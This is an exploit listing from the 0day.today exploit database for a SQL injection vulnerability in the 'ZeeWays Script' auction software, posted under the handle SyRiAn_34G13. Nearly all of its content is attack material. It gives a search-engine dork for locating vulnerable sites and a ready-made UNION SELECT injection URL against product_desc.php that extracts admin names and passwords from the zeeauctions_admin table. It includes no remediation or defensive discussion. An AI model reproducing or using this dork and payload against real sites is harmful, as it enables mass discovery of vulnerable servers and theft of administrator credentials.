[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ZeeWays Script SQL Injection Vulnerability

Author
SyRiAn_34G13
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10654
Category
web applications
Date add
10-01-2010
Platform
unsorted
==========================================
ZeeWays Script SQL Injection Vulnerability
==========================================

.............................................................
 
# Software Link: [downoad link if available]
 
.............................................................
 
# Version:
 
.............................................................
 
# Dork : [ inurl:"product_desc.php?id=" Powered by Zeeways.com ]
 
.............................................................
 
# Tested on: Apache/2.2.11
 
.............................................................
 
# Demo : http://server/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--
 
.............................................................
 
# ExPlOiT : product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--
 
.............................................................



#  0day.today [2024-12-24]  #